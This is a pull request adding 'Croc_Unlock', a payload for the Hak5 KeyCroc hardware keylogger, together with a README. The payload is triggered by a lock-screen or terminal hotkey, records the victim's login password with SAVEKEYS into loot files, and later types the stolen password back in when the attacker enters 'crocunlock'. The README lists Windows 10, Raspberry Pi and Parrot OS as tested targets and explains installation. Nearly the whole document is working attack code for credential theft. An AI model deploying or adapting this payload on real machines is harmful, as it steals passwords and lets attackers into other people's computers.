### PR TITLE
Create Croc_Unlock.txt

### DIFF
--- a/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt
+++ b/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt
@@ -1,0 +1,96 @@
+# Title:           Croc_Unlock
+# Description:     Save target passwd with SAVEKEYS command by pressing GUI-l or CONTROL-ALT-F3
+#                  Log in with typing crocunlock, save at /loot/Croc_Pot/Croc_unlock.txt.filtered and /tools/Croc_Pot/Croc_unlock.txt.filtered
+# Author:          Spywill / RootJunky
+# Version:         2.0
+# Category:        Key Croc
+
+MATCH (crocunlock|GUI-l|CONTROL-ALT-F3)
+
+UNLOCK_TMP="/tmp/unlock_Count.txt"
+
+if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
+	LED B
+else
+	mkdir -p /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot
+fi
+
+UNLOCK_FILE() {
+	until [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; do
+		:
+	done
+	LED G
+	Q DELAY 5000
+	LED OFF
+}
+
+UNLOCK_COUNT() {
+	if [ -f ${UNLOCK_TMP} ]; then
+		i=$(sed -n 1p ${UNLOCK_TMP})
+		echo $(( $i + 1 )) > ${UNLOCK_TMP}
+		RELOAD_PAYLOADS
+	else
+		echo $(( i++ )) > ${UNLOCK_TMP}
+		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+			cat /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered >> /root/udisk/loot/Croc_Pot/Croc_unlock.txt.filtered
+			rm -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered /root/udisk/tools/Croc_Pot/Croc_unlock.txt
+		fi
+	fi
+	Q DELAY 1000
+}
+
+case $LOOT in
+	GUI-l)
+		UNLOCK_COUNT
+		Q KEYCODE 00,00,2c
+		if [ "$(sed -n 1p ${UNLOCK_TMP})" -eq "0" ]; then
+SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER
+			LED ATTACK
+			UNLOCK_FILE
+		else
+			RELOAD_PAYLOADS
+			UNLOCK_FILE
+		fi
+;;
+	CONTROL-ALT-F3)
+		UNLOCK_COUNT
+		if [ "$(sed -n 1p ${UNLOCK_TMP})" -eq "0" ]; then
+			if [ -f /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt ]; then
+				Q STRING "$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)"
+				Q ENTER
+				Q DELAY 1000
+SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER
+				LED ATTACK
+				UNLOCK_FILE
+			fi
+		else
+			RELOAD_PAYLOADS
+			UNLOCK_FILE
+		fi
+;;
+	crocunlock)
+		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+			$(sed -i -e 's/'`sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt`'//g' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
+			$(sed -i -e 's/crocunlock//g' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
+			LED G
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q BACKSPACE
+			Q DELAY 1000
+			Q STRING "$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)"
+			Q ENTER
+			LED OFF
+			RELOAD_PAYLOADS
+		else
+			LED R
+			RELOAD_PAYLOADS
+		fi
+;;
+esac

--- a/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt
+++ b/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt
@@ -2,18 +2,15 @@
 # Description:     Save target passwd with SAVEKEYS command by pressing GUI-l or CONTROL-ALT-F3
 #                  Log in with typing crocunlock, save at /loot/Croc_Pot/Croc_unlock.txt.filtered and /tools/Croc_Pot/Croc_unlock.txt.filtered
 # Author:          Spywill / RootJunky
-# Version:         2.0
+# Version:         2.1
 # Category:        Key Croc
 
 MATCH (crocunlock|GUI-l|CONTROL-ALT-F3)
 
 UNLOCK_TMP="/tmp/unlock_Count.txt"
 
-if [[ -d "/root/udisk/loot/Croc_Pot" && "/root/udisk/tools/Croc_Pot" ]]; then
-	LED B
-else
-	mkdir -p /root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot
-fi
+CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
+for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
 
 UNLOCK_FILE() {
 	until [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; do
@@ -25,12 +22,12 @@ UNLOCK_FILE() {
 }
 
 UNLOCK_COUNT() {
-	if [ -f ${UNLOCK_TMP} ]; then
-		i=$(sed -n 1p ${UNLOCK_TMP})
-		echo $(( $i + 1 )) > ${UNLOCK_TMP}
+	if [ -f $UNLOCK_TMP ]; then
+		i=$(sed -n 1p $UNLOCK_TMP)
+		echo "$(( $i + 1 ))" > $UNLOCK_TMP
 		RELOAD_PAYLOADS
 	else
-		echo $(( i++ )) > ${UNLOCK_TMP}
+		echo "$(( i++ ))" > $UNLOCK_TMP
 		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
 			cat /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered >> /root/udisk/loot/Croc_Pot/Croc_unlock.txt.filtered
 			rm -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered /root/udisk/tools/Croc_Pot/Croc_unlock.txt
@@ -40,10 +37,19 @@ UNLOCK_COUNT() {
 }
 
 case $LOOT in
-	GUI-l)
+	"GUI-l" | "CONTROL-ALT-F3")
 		UNLOCK_COUNT
-		Q KEYCODE 00,00,2c
-		if [ "$(sed -n 1p ${UNLOCK_TMP})" -eq "0" ]; then
+		Q BACKSPACE
+		if [ "$(sed -n 1p $UNLOCK_TMP)" -eq "0" ]; then
+			if [ "$LOOT" = "CONTROL-ALT-F3" ]; then
+				if [ -f /root/udisk/tools/Croc_Pot/Croc_OS.txt ]; then
+					if [ "$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt)" = "raspberrypi" ]; then
+						Q STRING "$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)"
+						Q ENTER
+						Q DELAY 1000
+					fi
+				fi
+			fi
 SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER
 			LED ATTACK
 			UNLOCK_FILE
@@ -52,26 +58,10 @@ SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER
 			UNLOCK_FILE
 		fi
 ;;
-	CONTROL-ALT-F3)
-		UNLOCK_COUNT
-		if [ "$(sed -n 1p ${UNLOCK_TMP})" -eq "0" ]; then
-			if [ -f /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt ]; then
-				Q STRING "$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)"
-				Q ENTER
-				Q DELAY 1000
-SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER
-				LED ATTACK
-				UNLOCK_FILE
-			fi
-		else
-			RELOAD_PAYLOADS
-			UNLOCK_FILE
-		fi
-;;
 	crocunlock)
 		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
-			$(sed -i -e 's/'`sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt`'//g' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
-			$(sed -i -e 's/crocunlock//g' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
+			sed -i -e 's/'`sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt`'//g' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered
+			sed -i -e 's/crocunlock//g' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered
 			LED G
 			Q BACKSPACE
 			Q BACKSPACE

--- a/payloads/library/credentials/Croc_Unlock/README.md
+++ b/payloads/library/credentials/Croc_Unlock/README.md
@@ -1,0 +1,19 @@
+# Croc_Unlock
+## INTRODUCTION :
+* This project is developed for the HAK5 KeyCroc
+  - Pressing **GUI-l** will open windows / linux parrot OS login screen and wait for user to enter passwd with SAVEKEYS command
+  - Pressing **CONTROL-ALT-F3** will open Raspberry pi 4 terminal login screen and wait for user to enter passwd with SAVEKEYS command
+  - Type in **crocunlock** at the target login screen will delete crocunlock characters and enter user passwd
+  - Payload will save passwd at /tools/Croc_Pot/Croc_unlock.txt.filtered, this payload was design to help with Croc_Pot
+  - Old passwd will be save at /loot/Croc_Pot/Croc_unlock.txt.filtered
+
+  - **NOTE:** This payload is relying on the ENTER key to be press after user has enter passwd
+
+* **TESTED ON**
+  -  Windows 10
+  -  Raspberry pi 4
+  -  linux parrot OS
+ 
+ ## INSTALLATION :
+   - Will need to enter arming mode on your keycroc to install file.
+   - File is called **CrocUnlock.txt** Place this in the KeyCroc **payload folder**.


### PR DESCRIPTION
Pressing GUI-l will open windows / linux parrot OS login screen and wait for user to enter passwd with SAVEKEYS command Type in crocunlock at the target login screen will delete crocunlock characters and enter user passwd
NOTE: This payload is relying on the ENTER key to be press after user has enter passwd
Payload will save passwd at /tools/Croc_Pot/Croc_unlock.txt.filtered, this payload was design to help with Croc_Pot